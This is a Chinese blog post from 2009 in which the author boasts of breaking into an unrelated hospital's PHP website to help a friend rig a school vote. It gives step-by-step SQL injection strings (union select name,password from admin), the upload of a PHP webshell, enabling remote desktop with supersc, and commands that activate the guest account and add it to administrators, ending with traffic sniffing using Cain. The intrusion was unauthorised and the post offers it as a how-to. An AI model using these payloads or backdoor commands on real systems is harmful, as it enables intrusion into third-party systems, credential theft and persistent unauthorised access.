注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

溪亭残月的博客

I want bring you into my heart !!

 
 
 

日志

 
 

小菜入侵PHP站点  

2009-02-20 23:23:52|  分类: 入侵检测 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
前些日子在某IT学校上学的朋友找我,说他们学校举办什么晚会,然后节目要投票.他想他那个节目能拿第一,然而投票系统管理在他一个死对头手里,那个家伙也一样表演了节目,并且给自己刷了几万的投票.简单看了下投票系统,是纪录IP的投票形式,朋友换了N多IP刷也刷不过人家,无奈让我看看能不能拿下来.
  看了下他们学校的站点, ASP的,丢进啊D site:www.xxx.cn inurl:asp?id= 看了下没有注入,独立服务器.服务器补丁打的比较全,看来从站点还是服务器没有好入手的地方.
  扫描同网段的IP看了下,有一个医院的PHP的站点,找到一个php?id=的页面,添加and 1=1/*正常,and 1=2/*出错,存在PHP注射。如图:


继续:order by 字段数目/* 猜下字段数目.
order by 10/*出错,说明字段在10以内.
order by 6/*返回正常,字段是6 如图:
  

接下来我们猜表.
and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from 表名/*
其中的1,2,3,4,5,6,7,8,9,10是根据你的字段的多少填,我们这里的字段是6
我们在后面添加:and 1=2 union select 1,2,3,4,5,6 from admin/*
  

表明填的是admin,返回正常.说明存在admin这个表,如果出错就换成别的,如:user等.
页面暴出数字3和6,我们替换字段上的3和6,可以替换成:user().version().database(),来查询一些信息,因这里我把3换成name,6换成password,提交and 1=2 union select 1,2,name,4,5,password from admin/*.猜了几个用户没有猜出用户名.密码password猜出来来了。如图:
  

郁闷,抽根烟继续.猜了好久用户没有猜到,不知道换成什么了。无奈猜下后台,在后面添加/admin,发现整个站点目录全部出来了.
  

得来全不费工夫...不知道RP什么时候这么好了.
admin/phpmyadmin/直接翻出admin的用户密码,后台地址为:admin/root.php
进入后台直接传一个PHP马.Webshell拿到。
  

执行下命令,是system权限.
Net start发现Terminal Services终端已经开了.本想一切OK了,谁想连接不上.
Net start并没有发现类似防火墙的东西,而且服务器也并不是在内网.明明开了却连接不上,很郁闷..
Netstat -an 没有发现3389端口,其他也都是数据库或者80,并没有什么可疑的端口.
用TSSCAN扫描终端端口同样没发现.
不管了,再开一次.上传supersc,执行supersc.exe [-s 3389] [-r] 注明:[-s]可以任意填写端口  [-r]重启计算机
服务器重器之后连接OK,后来问了DEE才知道有时候看到Terminal Services,服务器也不一定就开了3389.
在webshell上执行: net user guest /active:yes 激活GUEST账户    
net user guest webshell 修改GUEST密码为webshell
net localgroup administrators guest /add 将GUEST添加为超级管理员
  
服务器用的是Apache,装上WinPcap,cain.设置好后开始嗅.

后记:文章技术性不高,只是PHP注射的一些基础罢了.asp玩久了没什么意思.PHP手工注射比较有意思,就是太累人.
  评论这张
 
阅读(131)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017